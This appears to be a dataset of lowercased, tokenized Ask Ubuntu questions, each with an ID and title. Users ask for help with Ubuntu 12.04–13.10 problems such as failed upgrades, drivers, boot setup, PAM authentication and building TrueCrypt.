libkqueue_include_dir used as include directory in directory /home/mirror/work/darling/darling/src/motool used as include directory in directory /home/mirror/work/darling/darling/src/util used as include directory in directory /home/mirror/work/darling/darling/src/libmach-o used as include directory in directory /home/mirror/work/darling/darling/src/libdyld used as include directory in directory /home/mirror/work/darling/darling/src/dyld used as include directory in directory /home/mirror/work/darling/darling/src/dyld used as include directory in directory /home/mirror/work/darling/darling/src/libsystem used as include directory in directory /home/mirror/work/darling/darling/src/libltdl used as include directory in directory /home/mirror/work/darling/darling/src/cocoa used as include directory in directory /home/mirror/work/darling/darling/src/libobjcdarwin used as include directory in directory /home/mirror/work/darling/darling/src/corefoundation used as include directory in directory /home/mirror/work/darling/darling/src/libncurses used as include directory in directory /home/mirror/work/darling/darling/src/coresecurity used as include directory in directory /home/mirror/work/darling/darling/src/coreservices used as include directory in directory /home/mirror/work/darling/darling/src/exceptionhandling used as include directory in directory /home/mirror/work/darling/darling/src/iokit used as include directory in directory /home/mirror/work/darling/darling/src/foundation used as include directory in directory /home/mirror/work/darling/darling/src/carbon used as include directory in directory /home/mirror/work/darling/darling/src/corevideo used as include directory in directory /home/mirror/work/darling/darling/src/opengl used as include directory in directory /home/mirror/work/darling/darling/src/thin used as include directory in directory /home/mirror/work/darling/darling/src/thin used as include directory in directory /home/mirror/work/darling/darling/src/libstdc++darwin libobjc2_include_dir used as include directory in directory /home/mirror/work/darling/darling/src/motool used as include directory in directory /home/mirror/work/darling/darling/src/util used as include directory in directory /home/mirror/work/darling/darling/src/libmach-o used as include directory in directory /home/mirror/work/darling/darling/src/libdyld used as include directory in directory /home/mirror/work/darling/darling/src/dyld used as include directory in directory /home/mirror/work/darling/darling/src/dyld used as include directory in directory /home/mirror/work/darling/darling/src/libsystem used as include directory in directory /home/mirror/work/darling/darling/src/libltdl used as include directory in directory /home/mirror/work/darling/darling/src/cocoa used as include directory in directory /home/mirror/work/darling/darling/src/libobjcdarwin used as include directory in directory /home/mirror/work/darling/darling/src/corefoundation used as include directory in directory /home/mirror/work/darling/darling/src/libncurses used as include directory in directory /home/mirror/work/darling/darling/src/coresecurity used as include directory in directory /home/mirror/work/darling/darling/src/coreservices used as include directory in directory /home/mirror/work/darling/darling/src/exceptionhandling used as include directory in directory /home/mirror/work/darling/darling/src/iokit used as include directory in directory /home/mirror/work/darling/darling/src/foundation used as include directory in directory /home/mirror/work/darling/darling/src/carbon used as include directory in directory /home/mirror/work/darling/darling/src/corevideo used as include directory in directory /home/mirror/work/darling/darling/src/opengl used as include directory in directory /home/mirror/work/darling/darling/src/thin used as include directory in directory /home/mirror/work/darling/darling/src/thin used as include directory in directory /home/mirror/work/darling/darling/src/libstdc++darwin configuring incomplete , errors occurred ! how can i build the darling project ?
362229	upgrade to 13.10 failed	did the upgrade , after the downloads it started the upgrade , then stopped at the `` downloading flash '' .. it stopped there for over an hour so i had no choice but to shut it down . now when it boots there is no top bay with the time , shutdown etc , ubuntu software installer etc will not run.. how do i fix it without losing all my installed apps and settings ?
362230	apt-get and vpn not talking ?	i am currently using a paid vpn connection in 12.04 . the redirect seems to work fine web browsing with firefox . however , running apt-get functions in terminal show that the repositories i hit are of the cn.archive.ubuntu.com type . should i not see for instance , if vpn is working in uk , uk.archive.ubutnu.com ? how can i correct this so that i reach the proper repositories ? thank you .
362232	after upgrading to 12.04 lts server , the mouse is intermittently working	after this upgrade , i 've had a problem with the mouse intermittently working and programs crashing ( like zentyal crashing and the error reporting application crashing ) i also had an error on the screen that said : '' could not grab your mouse . a malisious client may be eavesdropping on your session or you may have just clicked a menu or some application just decided to get focus . try again . '' what 's going on with this system ? did i really get malware that quickly ? this system has been boxed up since 2011 . i only did the upgrade today ... in regards to the mouse i can move it around , but when i click on something , it does n't work .
362235	trouble installing pokerstars on a live usb without persistence through wine	i need to install any form of texas hold em ' on a lubuntu live usb that does n't have persistence . i was able to download pokerstars.net by emulating the .exe ( a windows type file ) using wine for linux ( lubuntu ) . but , when i try to install , i have no room . the only place on the live usb is in the root folder which is set to read-only . is there any way i can change the read only properties of the live usb while it 's in use ? so , to recap . i am running lubuntu 13.04 and ca n't start in persistent mode . when i start normally everything worked fine . i proceeded to chromium and successfully downloaded wine and the pokerstars.exe . i right clicked the downloaded fiel then clicked wine , the installer loaded fine . there are about 8 different disk icons and only the one containing system files is active . is there any way i can use the terminal to install it to root .
362236	13.10 desktop - stop suspension on lid closure	i 'm having a problem with power management settings on my asus k52-f laptop . upgraded from 13.04 to 13.10 earlier today ; closing the laptop lid puts the laptop into suspension ( even on ac power - tried fixing it in gnome power settings , tried fixing it in cinnamon power settings , tried changing it in dconf-editor , but no matter where i change the setting the laptop lid still suspends ) . after resuming from suspend , i restore to the gnome window/login manager ( instead of cinnamon login manager ) . wifi does n't reconnect , but the icon in cinnamon shows that i 'm connected . ifconfig shows that the interface is up and working normally , but still not reconnecting . ifconfig wlan0 down / up does n't change anything . any help would be greatly appreciated .
362241	privacy and search panels missing from system settings in gnome 3.8	upgraded to ubuntu gnome 13.10 ( gnome 3.8 ) . i was expecting to see privacy and search panel in system settings . but they are missing . how do i get these ? do i need to install any additional packages ?
362244	screen scrolling on a vizio e420vo 1920x1080	i 've downloaded ubuntu a few weeks ago and i have been fighting this screen scrolling issue the entire time . here 's a video of what i 'm talking about http : //youtu.be/bopreumdqa0 i 've tried both ubuntu and fedora to see if it was unique to a particular distribution . in the end it happens no matter what version of linux i try to run . i 've been on forum after forum trying resolve this issue . recently i came upon a post on this site called 1920x1080 scrolling and it seemed to address exactly my problem . but i tried the suggested solution ( which seemed to work for the original poster ) but unfortunately not for me . for my monitor i use a vizio e420vo ( which has worked perfectly fine for the past three years with windows ) . and linux works just fine when hooked up to a regular computer monitor . so it 's definitely an issue with my tv . i 've tried creating a special file called /etc/x11/xorg.conf that specify 's my resolution plus horizontal and vertical frequencies . i 've also used the solution suggested in this post ca n't get 1920 x 1080 in ubuntu via vmware ( but no luck ) i 've updated all of my drivers i 've even tried staring at my monitor in frustration , nothing works ! here are my specs : linux version : ubuntu 12.04 processor : pentium dual core e5300 @ 2.60ghz 2.60ghz ram : 6 gb system type : 64 bit graphics : intell g31/g33 this is so annoying ! ! ! ! !
362247	nautilus header bar missing -- ubuntu gnome 13.10 ( gnome 3.10 )	so , i recently did a fresh install of ubuntu gnome 13.10 , added the gnome3-team/gnome3-next and gnome3-team/gnome3-staging ppa 's , and upgraded to gnome 3.10 . ( also using a dual-monitor system , 1920 x 1080 , nvidia-319 driver . ) everything was running fine after the updates ( including nautilus , or `` files '' ) , but when i opened nautilus , at some point , the header bar was gone , and it got stuck in full-screen mode . the header is there for every other application , though . i ca n't resize nautilus , i ca n't move it with the alt+f7 hotkey . i can , however , make the sidebar disappear with f9 and make the program close with alt+f4 . i can also bring up the window menu with alt+space , but the options to `` resize '' and `` move '' are greyed out , and the `` move titlebar onscreen '' does nothing when clicked . attempted solutions : i uninstalled , ran apt-get autoremove clean autoclean , and re-installed nautilus , including any subsequent applications that were removed -- no fix . i installed and tried replacing the titlebar theme with ambiance via gnome tweak tool to at least restore the header/title bar -- no fix . i created a new user , logged into that , and opened nautilus . it did open up in the windowed mode with the header bar , but then , without my involvement , went to full-screen without the header bar . same problem . running `` sudo nautilus '' from the terminal does open it ( full-screen , without header ) , but gives this error : ( nautilus:7531 ) : gtk-warning ** : failed to register client : gdbus.error : org.freedesktop.dbus.error.serviceunknown : the name org.gnome.sessionmanager was not provided by any .service files here 's a screenshot of the complete nautilus dialog box :
362250	wireless connection setting in ubuntu-12.04.3-desktop-i386 ( offline )	i just installed ubuntu-12.04.3-desktop-i386 , but it did n't detect my wireless card ( bcm4313 ) . i do n't have internet connection in ubuntu , but i have wireless connection in window 7 environment . i googled about it , and i found this solution for offline operation : i believe the package you need is linux-firmware-nonfree . please download the package , transfer it on a usb stick or similar to the desktop of the xubuntu machine . open terminal and type : sudo dpkg -i desktop/linux*.deb sudo modprobe -r b43 & & sudo modprobe b43 you should be all set . i have followed the above instructions but still it is not working .
362252	install ubuntu 13.10 on eeepc , 32-bit or 64-bit ?	i have a 32-bit eeepc with 4gb ram . can i install ubuntu 13.10 64-bit on it ? i want to know whether i should install ubuntu 32-bit or 64-bit before i download the iso .
362256	how can i custom paper size on a ppd file for lexmark 709 or a code in java	i ca n't print because i live in colombia ( south-america ) and the printing sizes are different here . so , i have n't been able to find a driver that can help me to set up my printer in linux ubuntu without leaving more spaqce in a single sheet or printing till the end of the paper . i do n't know what to do . can i manage this trouble with the new version of ubuntu 13.10 ? . which website can help me to fix it , or how can i create or paste for ppd printing to let my printer print correctly ? i really appreciate any help . thanks a lot ! ! !
362257	upgrade from ubuntu 13.04 to 13.10 causes vmware workstation 9 problems	so , upgrading caused problem where running vmware ws 9 needed patches to accommodate linux kernel 3.11 . i applied the fixes i found that others reported , and now i can only run vmware ws 9 from sudo . if i run it from standard user , it says it wants to recompile modules , which it does not do unless i open up a terminal and run sudo vmware . that works , but would like it to work correctly -- i.e . have the modules that are recompiled stick . when running under sudo it does recompile with errors.. ( vmware-unity-helper:13019 ) : gtk-warning ** : unable to locate theme engine in module_path : `` murrine '' , but it starts up and works ok. any ideas ?
362259	how to watch videos in amazon prime instant video ?	today i upgraded from ubuntu 12.04 to ubuntu 13.10 . i am not able to watch any videos in amazon prime instant video . i am getting this message : an error occurred and your player could not be updated . this is likely because your flash player or browser needs to be updated . this update is required to play back this video .
362260	universal pen drive linux will not burn ios ubuntu 13.10 to usb	universal pen drive linux will not let me burn the iso to my usb . whenever i attempt it it says 'can not open file 'e : *where i put my downloads*\ubuntu-13.10-desktop-amd64.iso ' as archive ' . any help please . i just want to move to ubuntu and hopefully never have to use windows again : d please help me and walk me through this process .
362262	so many linux distributions so less apps ?	why are there more linux distributions that apps for it ? the only problem with linux as far as i can see is apps and if people can develop so many linux distros then why not apps ? http : //en.wikipedia.org/wiki/list_of_linux_distributions
362263	what is `` default applications for lxsession '' in lubuntu 13.10 ?	users of lubuntu 13.10 will notice a new entry in menu , preferences called default applications for lxsession . if that entry is selected , a window , shown below , opens : this window , which can also be invoked by running lxsession-default-apps from a terminal has several tabs and each tab has several features . how are these features used ? some are obvious , others are n't . man lxsession-default-apps has nothing : [ 10:48 am ] ~ $ man lxsession-default-apps no manual entry for lxsession-default-apps see 'man 7 undocumented ' for help when manual pages are not available . [ 10:48 am ] ~ $ http : //packages.ubuntu.com/saucy/lxsession-default-apps just mentions that it is a `` utility to configure lxsession and its default applications '' https : //blueprints.launchpad.net/ubuntu/saucy ? searchtext=lxsession-default-apps draws a blank . the release notes do n't mention it . https : //help.ubuntu.com/community/lubuntu/setup # applications has nothing . i looked at the mailing list and found a mention : lxsession seems to not handle properly the migration to saucy for autostarted stuff . you can look at lxsession-default-apps , under autostart , and change the settings for disable autostart to no . it will force a revert to the previous behavior , until i properly fix the migration . regards , julien lavergne does anyone know more about default applications for lxsession and how it is to be used ?
362266	unable to boot ubuntu with window xp	i have 500gb of hdd , my partition are like this 80 gb windows ( primary partition ) /dev/sda1 80 gb ubuntu 12.04 ( primary partition ) ( /dev/sda2 ) and remaining extended partition of > 300 gb ( /dev/sda4 ) my motherboard is efi compatible , initially i installed window in efi mode of bios , after a lot workaround of installing dual boot system in efi mode i switched back to legacy mode i installed ubuntu 12.04 after switching back to legacy mode and every time i start my system windows xp start . i tried to rewrite grub from live cd these are the commands i got from many site sudo mount /dev/sdx /mnt sudo grub-install -- root-directory=/mnt/ /dev/sdx i have rewrite grub in /dev/sda which is root of my hdd and then i wounded up with following error `` no such partition grub rescue '' i googled for this error and got many things to do but before doing further action on this i thing error is because of switching from efi to legacy . should i format my hdd and with raw hdd , first i should install window and then ubuntu . my question is : how efi and legacy bios maintain mbr record ?
362269	network does n't work after upgrading to 13.10	i upgraded from 13.04 to 13.10 , and a number of things stopped working . most importantly , i do n't have internet access anymore . when i go to the network settings , i receive the following error : the system network services are not compatible with this version . the only settings that show up in the network settings are the proxy settings . i tried sudo service network-manager start and sudo service network-manager restart , but it told me the service was already running . in addition , the menu bar is missing all of the indicators ( such as keyboard layout , sound , network , clock , and the gear icon ) . is this related or a separate issue ?
362270	resume upgrade to 13.10	i had 13.04 and started to upgrade to 13.10 . but the computer hanged and i rebooted it . i did instructions from how do i resume a release upgrade/update ? now os launches , but i upgrade is incomplete : there is no panels in unity ( just a background with some files on desktop ) . i think that some post-install scripts did n't launch . please help me with this trouble . p.s . or how can i completely reinstall unity ( with all of the dependencies ) ? my be it helps . ubuntu @ ext : ~ $ cat /etc/lsb-release distrib_id=ubuntu distrib_release=13.10 distrib_codename=saucy distrib_description= '' ubuntu 13.10 '' ubuntu @ ext : ~ $ sudo do-release-upgrade checking for a new ubuntu release no new release found
362272	installation of ubuntu mobile os on sony ericsson live with walkman	i am using live with walkman from sony ericsson with specs http : //www.sonymobile.com/global-en/products/phones/live-with-walkman/specifications/ now is it possible to install ubuntu touch on my device ? ?
362274	cascading authentication pam login	i 'm trying to set up an authentication scheme for ubuntu using the pam files . however , i can not figure out how to have two separate methods of authentication . i 've set up a yubikey authentication , however , no matter what , the console prompts for both password and yubikey otp . both have to be correct , however , what i want is for a prompt for the yubikey , if success , login . if the yubikey auth fails , then prompt for a password . but no matter what , i get a prompt for both yubikey otp and password . required , sufficient keywords do n't seem to make a difference . i 'm having trouble figuring out how to stack auth configurations like this . to summarize : i want to authenticate by method a . if a fails , attempt to authenticate by b .
362278	slow video reproduction quality in youtube with chromium and firefox in ubuntu 13.10	that 's it i ca n't watch a video in youtube simple because the reproduction is too slow and it 's somewhat paused . i seem to have flash player plugin installed in both chromium and firefox ( i have n't tried chrome though , i 'll try it later to see what happens ) i do n't know if that 's enough but i just need to fix that bug . could someone advice me to do something ? is there anything i can do ?
362279	evince 3.10 with menubar	i find that the 2 buttoms menu from the evince v3.10.0 are not really useful . why did ubuntu not re add an menubar ? . it would have been looking better in unity ! the unity top panel has enough space for an normal program menu . here is an screenshot of what i mean : ( the program works already in ubuntu 13.10 with unity or cinnamon fine . some little compiler warnings but nothing more ) example in cinnamon or in unity
362280	enter ssh passphrase once	before upgrade when i was running git clone git @ ... ( using ssh ) once per computer restart a window dialog was appearning that was containing a textbox where i was intersting my ssh passphrase and click ok. then , the passphrase was no longer required until the next computer restart . after upgrading to 13.10 after upgrading to ubuntu 13.10 that window does n't appear anymore but a message in terminal appears : enter passphrase for key '/home/username/.ssh/id_rsa ' : ... every time when cloning a git repository this appears . how can i fix this ? i want to enter my passphrase only once .
362291	brother printer dcp-j140w is not getting installed on ubuntu 13.10	i am new to ubuntu & have installed 13.10 amd64 version . please explain me easiest way to install driver for my printer dcp-j140w step by step . thanks
362292	tata photon whiz not detected in ubuntu 12.04	i am having problem in connecting tata photon huwai modem in ubuntu 12.04 . whenever i connect it in a port , it displays nothing , or do not get detected . i have tried wvdial to configure it manually , but it went in vain . so provide me some proper steps to configure it manually or give any suggestion .
362293	ubuntu 13.10 installation wo n't start . instead i get a black screen	recently i purchased a lenovo g500 and installed windows 7 in it . then i thought of installing ubuntu 13.10 64-bit os alongside windows 7 ultimate . i created a bootable usb using unetbootin . it started . then whatever the option i chose i landed in the black screen . i ca n't even see the purple screen . i have 2gb amd radeon graphics card hd 8500m series and 1.75gb intel hd graphics 4000 , besides 4gb ram . also can i install ubuntu in the legacy mode so that i can access both the oses ? i tried to install ubuntu 13.10 64-bit in a virtual machine and it went smoothly . what is the problem and how to fix it ?
362296	how to make nvidia command permanent	i 'm running ubuntu 12.04 with an nvidia geforce gt620 video card . as i 'm running it through an older lg dlp tv i was having problems with overscan till i discovered this command that fixes the overscan problem : sudo nvidia-settings -- assign 0/currentmetamode= '' dfp-0 : 1280x720 { viewportin=1280x720 , viewportout=1190x680+44+20 } '' unfortunately i 've had no luck in making this part of the startup process and i need to run the command in a terminal each time the pc starts . i 've tried adding 0/currentmetamode= '' dfp-0 : 1280x720 { viewportin=1280x720 , viewportout=1190x680+44+20 } '' to nvidia-settings-rc via gedit ~/.nvidia-settings-rc but still no luck in making the command permanent for each reboot . any ideas on what should i try next ?
362299	how can i speed up the dash ?	i have this issue with ubuntu 13.10 . the dash is simply too laggy when it comes to type something into it moreover it takes more than 3 secs to open so i can type something inside . it 's fastidious and quite disappointing . i 've seen this issue in computers with much more power resources and that somewhat comply with the standard requirements . come one i 've seen this bug on pc 's with 3gb of ram and 2,6ghz processors not to mention the advanced graphic cards . can this bug be solved in the future or will it stick around with ubuntu as long as it 's installed on my pc ? please answer something .
362301	unknown monitor problem	my display settings detects another display besides my built in monitor on an asus aspire 5755g . so i allways have my built in display and a second uknown monitor . i can deactivate this display ( unknowns ) from the on/off button but this is frustrating after doing it every time i log in or out . i red some forums and some people say that the problem goes away after installing the nvidia drivers . the problem is that i did and after install the screen allways went black leaving me only with the cursor and the ctrl+alt+f1 console for commend so i managed uninstalling it to get my dektop back . so if annyone could help out with this problem that would be great . i just updated to 13.10 . did n't have this problem on 13.04 . thx
362303	lenovo bluetooth keyboard does not recognize fnlk in ubuntu = (	everything works fine , except that in my ubuntu os it is still impossible to use fnlk so i have to use fn if i want to press f1-f12 . in the windows it works ok . anyway the keyboard is good and i hope someone from ubuntu community will suggest some workaround soon .
362306	so this weird stop sign keeps flickering on my screen . i am using ubuntu 13.04 .	here 's a screen-shot it keeps flickering constantly . its really annoying . upgrading to 13.10 to see if it gets resolved . any ideas as to what could cause this ?
362308	pendrive is not working after installing ubuntu 13.04 64 bit on it . help ?	i 've installed ubuntu 13.04 64 bit on my hp v115w 8 gb pendrive . i mean the full installation , not the livedisk one . now the pendrive is completely dead . it booted from the pendrive couple of times last night . but after that today the computer is not even detecting the hardware.i 've tried other computers but no computer shows any response when the drive is plugged in . i saw device manager , disk manager.. nowhere the drive is being detected ! i know there is not any hardware failure ! i need some urgent help ! ! please . thank you !
362312	building truecrypt on ubuntu 14.04	with the whole nsa thing people tried to re-build identically looking binaries to the ones which truecrypt.org provides , but did n't succeed . so some think they might be compiled with back-doors which are not in the source code . - > so how compile on the latest ubuntu version ( i 'm using ubuntugnome but that should n't matter ) ? i tried some tutorials for previous ubuntu versions but they seem not to work any-more ? edit : https : //madiba.encs.concordia.ca/~x_decarn/truecrypt-binaries-analysis/ now you might think `` ok , we do n't need to build '' , but : to build he used closed-source software and there are proof-of-concepts where a compromised compiler still put backdoors into the binary : 1. source without backdoors 2. binary identically to the reference-binary 3. binary contains still backdoors edit2 ( reply to post ) : when using $ make -j 2 pkcs11_inc= $ home/src/pkcs-11 i get : ... /usr/include/wx-2.8/wx/dynarray.h:669:5 : note : in expansion of macro ‘_wx_define_typearray_ptr’ _wx_define_typearray_ptr ( _wxarray # # name , name , base , classdecl ) ^ /usr/include/wx-2.8/wx/dynarray.h:655:5 : note : in expansion of macro ‘wx_define_typearray_with_decl_ptr’ wx_define_typearray_with_decl_ptr ( t , name , base , class wxdllexport ) ^ /usr/include/wx-2.8/wx/dynarray.h:829:5 : note : in expansion of macro ‘wx_define_exported_typearray_ptr’ wx_define_exported_typearray_ptr ( t , name , wxbasearrayptrvoid ) ^ /usr/include/wx-2.8/wx/bookctrl.h:26:1 : note : in expansion of macro ‘wx_define_exported_array_ptr’ wx_define_exported_array_ptr ( wxwindow * , wxarraypages ) ; ^ linking truecrypt /usr/bin/ld : /home/user/src/truecrypt-7.1a-source/volume/volume.a ( securitytoken.o ) : undefined reference to symbol 'dlopen @ @ glibc_2.1' /lib/i386-linux-gnu/libdl.so.2 : error adding symbols : dso missing from command line collect2 : error : ld returned 1 exit status make [ 1 ] : *** [ truecrypt ] error 1 make : *** [ all ] error 2 user @ user-pc : ~/src/truecrypt-7.1a-source $ when using $ make -j 2 pkcs11_inc= $ home/src/pkcs-11 libs=-ldl : ... forms/volumesizewizardpage.o : in function `truecrypt : :volumesizewizardpage : :getvolumesize ( ) const ' : volumesizewizardpage.cpp : ( .text._znk9truecrypt20volumesizewizardpage13getvolumesizeev+0x80 ) : undefined reference to `truecrypt : :stringconverter : :touint64 ( std : :basic_string , std : :allocator > const & ) ' forms/volumesizewizardpage.o : in function `truecrypt : :volumesizewizardpage : :setvolumesize ( unsigned long long ) ' : volumesizewizardpage.cpp : ( .text._zn9truecrypt20volumesizewizardpage13setvolumesizeey+0x8f ) : undefined reference to `truecrypt : :stringconverter : :fromnumber ( unsigned long long ) ' forms/wizardframe.o : in function `truecrypt : :wizardframe : :setstep ( int , bool ) ' : wizardframe.cpp : ( .text._zn9truecrypt11wizardframe7setstepeib+0xe6 ) : undefined reference to `truecrypt : :event : :connect ( truecrypt : :eventconnectorbase const & ) ' collect2 : error : ld returned 1 exit status make [ 1 ] : *** [ truecrypt ] error 1 make : *** [ all ] error 2 user @ user-pc : ~/src/truecrypt-7.1a-source $ ( same without the make -j ... parameter btw ) edit3 now it works , thanks user76204 and geo : $ sudo apt-get install build-essential nasm libfuse-dev wx-common wx2.8-headers libwxbase2.8-dev libwxsvg-dev libwxgtk2.8-0 libwxgtk2.8-dev $ mkdir -p $ home/src/pkcs-11 put truecrypt sources to /home/username/truecrypt-7.1a-source start building : $ libs=-ldl make -j 2 pkcs11_inc=/home/username/src/pkcs-11/
362317	while installing google-chrome-stable -i386.deb ?	while updating it told to try running apt-get -f install . on doing this i 'm facing the following error : reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following extra packages will be installed : gconf-service gconf2-common libgconf-2-4 the following packages will be removed : gconf-service-backend the following packages will be upgraded : gconf-service gconf2-common libgconf-2-4 3 upgraded , 0 newly installed , 1 to remove and 961 not upgraded . 2 not fully installed or removed . need to get 0 b/1,846 kb of archives . after this operation , 6,053 kb of additional disk space will be used . do you want to continue [ y/n ] ? y warning : the following packages can not be authenticated ! gconf-service libgconf-2-4 gconf2-common install these packages without verification [ y/n ] ? y ( reading database ... 143783 files and directories currently installed . ) preparing to replace gconf-service 3.2.5-0ubuntu2 ( using ... /gconf-service_3.2.5-1+build1_i386.deb ) ... unpacking replacement gconf-service ... dpkg : error processing /var/cache/apt/archives/gconf-service_3.2.5-1+build1_i386.deb ( -- unpack ) : trying to overwrite '/usr/lib/i386-linux-gnu/gconf/2/libgconfbackend-evoldap.so ' , which is also in package gconf-service-backend 3.2.5-0ubuntu2 dpkg-deb ( subprocess ) : subprocess data was killed by signal ( broken pipe ) dpkg-deb : error : subprocess returned error exit status 2 errors were encountered while processing : /var/cache/apt/archives/gconf-service_3.2.5-1+build1_i386.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 )
362319	downgrade php5 5.5.3 to php5 5.3 in ubuntu 13.10	i just upgraded to ubuntu 13.10.. i was working on a project that uses php 5.3 and now phpmyadmin is not working and when i try to open a page i see a ton of warning and the sign in page doesnt sign me in.. how can i downgrade ? i tried removing php and phpmyadmin and re-installing but nothing happened . this is what i get when i try php-v php 5.5.3-1ubuntu2 ( cli ) ( built : oct 9 2013 14:49:12 ) copyright ( c ) 1997-2013 the php group zend engine v2.5.0 , copyright ( c ) 1998-2013 zend technologies with zend opcache v7.0.3-dev , copyright ( c ) 1999-2013 , by zend technologies
362320	restrict pptp server with ip and port	i know how to restrict access by ip with /etc/ppp/chap-secrets like this : test pptpd test 172.16.111.100 172.16.111.111 but i need know how to restrict with both ip and port ?
362321	no mouse pointer - ubuntu 13.10	just installed 13.10 on my hp envy m6 laptop and have no mouse pointer . my usb mouse does not work and neither does the track pad . when i booted from a usb key everything worked ok but once installed it seems to have broken the mouse . unlike other posts , there is no flicker , it simply does n't work at all . my laptop is an i5 with 6gb and dual intel and amd radeon graphics . any help would be gratefully received as i really ca n't stand windows 8 any longer . thanks .
362326	installing owncloud server on ubuntu	i installed ubuntu server and did not know what to do at command prompt so i ended up doing the install desktop command so i could have a gui . i have the owncloud server package downloaded but do not have the permission to move it into the /var/www/ folder . i was following the instructions here : http : //ubuntuserverguide.com/2012/05/install-owncloud-4-ubuntu-server-1204-lts.html , but could n't get past step 2 .
362327	unable to install google chrome in ubuntu12.04 via `` google-chrome-stable_current_i386.deb ''	after typing the command `` sudo dpkg -i google-chrome-stable_current_i386.deb `` the follwing error occurs . how can i fix this ? can somebody help me . please ... ! ! sandeep @ sandeep-pc : ~/downloads $ sudo dpkg -i google-chrome-stable_current_i386.deb selecting previously unselected package google-chrome-stable . selecting previously unselected package google-chrome-stable . ( reading database ... 143783 files and directories currently installed . ) unpacking google-chrome-stable ( from google-chrome-stable_current_i386.deb ) ... dpkg : dependency problems prevent configuration of google-chrome-stable : google-chrome-stable depends on lib32gcc1 ( > = 1:4.1.1 ) ; however : package lib32gcc1 is not installed . google-chrome-stable depends on lib32stdc++6 ( > = 4.6 ) ; however : package lib32stdc++6 is not installed . google-chrome-stable depends on libc6-i386 ( > = 2.11 ) ; however : package libc6-i386 is not installed . dpkg : error processing google-chrome-stable ( -- install ) : dependency problems - leaving unconfigured processing triggers for bamfdaemon ... rebuilding /usr/share/applications/bamf.index ... processing triggers for desktop-file-utils ... processing triggers for gnome-menus ... processing triggers for man-db ... errors were encountered while processing : google-chrome-stable
362328	when shut down lubuntu 13.10 google chrome doesnt reopen sites	when i am shutting down lubuntu 13.10 with google chrome running , then after starting my lubuntu , google chrome says that was n't properly closed and i have to be refreshed to open last opened sites . p.s . i just upgrade lubuntu from 13.04 to 13.10 on my acer one d270 netbook
362330	downgrading ubuntu 13.10	i 'd like to downgrade from ubuntu 13.10 back to an older version . i.e . 13.04 . can i just boot ubuntu installer , uninstall ubuntu 13.10 and install 13.04 without any problems to my home folder ?
362333	kerio vpn client broken count > 0	i 've just installed this package : kerio-control-vpnclient-8.1.1-1212-p3-linux.deb using following command : sudo dpkg -i -- force-architecture -- force-depends kerio-control-vpnclient-8.1.1-1212-p3-linux.deb the kerio client works as well but now i 've an issue with apt , indeed i 'm unable to install no new packages since there is a brokencount > 0 error ( unresolved dipendencies : apt believes that kerio client has an unresolved dependencies with openssl ) clearly if i try : sudo apt-get install -f apt simple remove my kerio client . any idea ? i 'd like to avoid to uninstall kerio every time i 've to use apt . thanks in advance !
362335	rhythmbox not shown in gconf-editor ( ubuntu 12.04 ) ?	in rhythmbox , i 'm trying to find out which folders are in the library watch list . according to the help file , you can use gconf-editor to add/remove them at /app/rhythmbox/library_locations . but , in the config editor , rhythmbox is not listed . i 'm using ubuntu 12.04 . thanks !
362336	has anyone installed ubuntu touch on the samsung h1 smartphone ?	let me know if it worked . because i want use the same operating system on my laptop and phone .
362337	if external display is connected { `` lid is closed : do nothing '' } else { `` lid is closed : suspend '' } ?	my laptop suspends when i close the lid , as i want it to . however , when i connect an external display ( hdmi ) and keyboard ( usb ) , i like to be able to close the lid of the laptop , without suspending the whole system . is there a setting or script to get this behavior ?
362338	why does ubuntu 13.10 still not include mariadb ?	what is the reason 13.10 still does not include mariadb ? i consider switching from mysql to mariadb on 13.10 and wonder what 's holding back ubuntu . ps : even if mariadb is not yet included in the distro , i hope the migration will at least be painless .
362342	install everpad on ubuntu 13.10 and 14.04	i just installed a fresh copy of ubuntu 13.10 and wanted to install everpad but there is some issue as the ppa for it is missing it . these were the commands which i execute ( took help from http : //www.webupd8.org/2012/09/everpad-integrates-evernote-with-ubuntu.html and everywhere its the same ) : sudo add-apt-repository ppa : nvbn-rm/ppa sudo apt-get update sudo apt-get install everpad the following which what i get when the last command is executed : reading package lists ... done building dependency tree reading state information ... done e : unable to locate package everpad please help
362343	how can i reverse natural scrolling on ubuntu 13.10 ?	i tried to change the .xmodmap file as pointer = 1 2 3 4 5 6 7 8 9 10 11 12 but natural scrolling was not changed .
362344	unable to boot from usb boot drive for amd athlon 64	i am trying to install ubuntu 13.04 iso for amd64 athlon processor using usb drive ( 8gb ) . i did create a bootable usb using the usb installer from win7 intel 32bit processor ( followed steps from here : http : //www.ubuntu.com/download/desktop/create-a-usb-stick-on-windows ) . this usb is unable to boot on my amd64 bit processor . the bios is able to detect the usb and once i change the boot order to usb and save exit from bios , i get a message saying `` disk boot failure , insert system disk and press continue '' and unable to proceed further . however earlier to this i have successfully installed ubuntu 13.04 on to my laptop which has intel 32 bit core i5 processor with the same procedure but my desktop which has amd64 is failing . i also tried to create the usb installer on my desktop which has the amd64 bit processor and tried booting which also resulted in the same error . ( my desktop currently has win xp ) please help as i have run out of options . thanks , nagarjun
362345	verttwofingerscroll and vertedgescroll not settable via xorg.conf	i 've just upgraded to saucy ( this was working in raring ) . i 've tried rebooting . here 's /etc/x11/xorg.conf : section `` inputclass '' identifier `` touchpad '' driver `` synaptics '' matchistouchpad `` on '' option `` pressuremotionminz '' `` 60 '' option `` maxtapmove '' `` 4 '' option `` palmdetect '' `` 1 '' option `` verttwofingerscroll '' `` 1 '' option `` vertedgescroll '' `` 0 '' endsection and here 's the output from synclient : leftedge = 100 rightedge = 2408 topedge = 71 bottomedge = 1249 fingerlow = 1 fingerhigh = 1 maxtaptime = 180 maxtapmove = 4 maxdoubletaptime = 180 singletaptimeout = 180 clicktime = 100 emulatemidbuttontime = 75 emulatetwofingerminz = 282 emulatetwofingerminw = 7 vertscrolldelta = 56 horizscrolldelta = 56 vertedgescroll = 1 horizedgescroll = 1 cornercoasting = 0 verttwofingerscroll = 0 horiztwofingerscroll = 0 minspeed = 1 maxspeed = 1.75 accelfactor = 0.0705716 touchpadoff = 2 lockeddrags = 0 lockeddragtimeout = 5000 rtcornerbutton = 2 rbcornerbutton = 3 ltcornerbutton = 0 lbcornerbutton = 0 tapbutton1 = 1 tapbutton2 = 3 tapbutton3 = 0 clickfinger1 = 1 clickfinger2 = 1 clickfinger3 = 0 circularscrolling = 0 circscrolldelta = 0.1 circscrolltrigger = 0 palmdetect = 1 palmminwidth = 10 palmminz = 200 coastingspeed = 20 coastingfriction = 50 pressuremotionminz = 60 pressuremotionmaxz = 160 pressuremotionminfactor = 1 pressuremotionmaxfactor 